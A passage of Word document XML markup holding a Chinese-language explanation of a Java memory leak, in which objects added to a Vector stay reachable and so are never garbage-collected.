    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>找到一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>这里引用一个常看到的例子，在下面的代码中，循环申请Object对象，并将所申请的对象放入一个Vector中，如果仅仅释放对象本身，但因为Vector仍然引用该对象，所以这个对象对GC来说是不可回收的。因此，如果对象加入到Vector后，还必须从Vector中删除，最简单的方法就是将Vector对象设置为null。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="00F72422">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="689"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>Vector v = </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> Vector(</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>);    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="689"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>; i &lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>; i++)    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="689"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="689"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Object o = </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> Object();    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="689"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>v.add(o);    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="689"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>o = </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="00F72422">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="689"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>此时，所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>对象都没有被释放，因为变量</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>引用这些对象。</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="004076A5" w:rsidRDefault="0018487C" w:rsidP="004076A5">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="125" w:after="125" w:line="263" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:jc w:val="left"/>
        <w:rPr>
